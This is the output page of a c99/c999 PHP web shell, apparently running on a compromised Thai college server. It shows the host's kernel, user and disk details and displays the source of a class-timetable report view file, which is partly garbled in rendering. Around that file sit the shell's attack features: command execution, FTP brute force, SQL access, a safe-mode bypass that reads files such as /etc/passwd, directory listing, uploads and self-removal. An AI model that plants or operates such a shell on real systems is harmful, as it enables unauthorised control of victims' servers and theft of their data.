!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/views/eregis/   drwxr-xr-x
Free 51.01 GB of 127.8 GB (39.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_rptRis117.php (4.18 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
$cfgClgLogo 
= (! isset($cfgClgLogo)? "" $cfgClgLogo);
$cfgClgName = (! isset($cfgClgName)? "" $cfgClgName);
$cfgSiteName = (! isset($cfgSiteName)? "" $cfgSiteName);
?>
<style>
td
  { white-space: nowrap; margin: 0; }
</style>
<table align="center">
    <tr><td colspan="3" align="left">
    <input type="button" value="กลับ" onClick="location.href='<?php echo "searchRptRis117";?>'">
    <!-- <input type="button" value="กลับ" onclick="history.back()"/> --></td></tr>
    <tr><td colspan="3" align="left"><hr/></td></tr>
    <tr>
        <td><img src="<?=base_url().$this->config->item('rg_upload_picture').$cfgClgLogo;?>" width="111" height="95" align="absmiddle" border="0"></td>
        <td><font size="2"><b><?=$cfgClgName;?><br><?=$cfgSiteName;?></b></font></td>
        <td align="right" valign="top"><font size="2"><b>RIS117</b></font></td>        
    </tr>    
    <tr valign="top">
        <td align="center" colspan="3"><hr color="#000000" noshade><br></td>
    </tr>
    <tr>
        <td colspan="3" height="22" align="center"><font size="3" ><b>ตารางสอนประจำภาคการศึกษา</b></font></td>
    </tr>
    <tr>
        <td colspan="3" height="22" align="center"><font size="2" ><b>ภาคการศึกษาที่</b> <?php echo $tmId;    ?>
        <b>ปีการศึกษา</b> <?php echo $acadYear;?></font></td>
    </tr>
    <tr>
        <td colspan="3" height="22" align="center"><font size="2" ><b>นักศึกษาชั้นปี </b> <?php echo $syId;    ?>
        <b>หลักสูตร</b> <?php echo $curName;?></font></td>
    </tr>
    <tr>
        <td colspan="3" height="22" align="center"><font size="2" ><b>วันเปิด-ปิดภาคการศึกษา</b> <? if($qu_sd->num_rows()) { $row $qu_sd->row();  echo abbreDate(splitDateDb2($row->sdSDate)).' - '.abbreDate(splitDateDb2($row->sdEDate)); }?></font></td>
    </tr>
    <tr>
        <td colspan="3" height="22" align="center"><font size="2" ><b>วันสอบกลางภาค</b> <? if($qu_sd->num_rows()) { $row $qu_sd->row();  echo abbreDate(splitDateDb2($row->sdMidExamSDate)).' - '.abbreDate(splitDateDb2($row->sdMidExamEDate)); }?></font></td>
    </tr>
    <tr>
        <td colspan="3" height="22" align="center"><font size="2" ><b>วันสอบปลายภาค</b> <? if($qu_sd->num_rows()) { $row $qu_sd->row();  echo abbreDate(splitDateDb2($row->sdFinalExamSDate)).' - '.abbreDate(splitDateDb2($row->sdFinalExamEDate)); }?></font></td>
    </tr>
    <tr>
        <td colspan="3" height="22"></td>
    </tr>
    <tr>
        <td colspan="3"><table border="1" cellspacing="0" cellpadding="0" bordercolor="#000000" style="border-collapse: collapse" align="center">
            <tr>
                <td height="22" align="center"><font size="2"><b>วัน/เวลา</b></font></td>
<?php
            
if($rs_prd->num_rows()){
                foreach(
$rs_prd->result() as $row) {
?>
                <td align="center"><font size="2"><b><?php echo substr($row->prdFrTime05).' - '.substr($row->prdToTime05);?></b></font></td>
<?php
                
}
            }
?>
            </tr>
<?php
        
if($rs_dy->num_rows()){//loop day
            
foreach($rs_dy->result() as $row) {
?>
            <tr>
                <td height="22" align="center"><font size="2"><?php echo $row->dyName;?></font></td>
<?php
            
if($rs_prd->num_rows()){ //loop prd
                
foreach($rs_prd->result() as $row_prd) {
                    
$i 0;
                    
$str '';
                    
$rs_co $co->qryCoBetweenPr($curId$acadYear$syId$tmId$row->dyId$row_prd->prdId);
                    foreach(
$rs_co->result() as $row_co) {
                        
$rs_tt $tt->qryTTJOINRoom($row_co->coId$row->dyId$row_prd->prdId);                        
                        foreach(
$rs_tt->result() as $row_tt) {                                                                                
                            if(
$i == 0)
                                
$str $row_co->crsCode.' '.$row_co->crsName.' กลุ่ม '.$row_co->coSection.' ห้อง '.$row_tt->rmNo.' อ.'.$row_tt->prsName;
                            else
                                
$str .= '<br>'.$row_co->crsCode.' '.$row_co->crsName.' กลุ่ม '.$row_co->coSection.' ห้อง '.$row_tt->rmNo.' อ.'.$row_tt->prsName;
                            
$i++;
                        }    
// end foreach tt
?>
                <td><font size="2"><?php echo $str;?></font></td>
<?php
                    
}    //end foreach prd
                
//end foreach prd
            
//end loop prd
?>
            </tr>
<?php
            
}    // end foreach dy
        
}//end loop day
?>
        </table></td>
    </tr>                    
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0157 ]--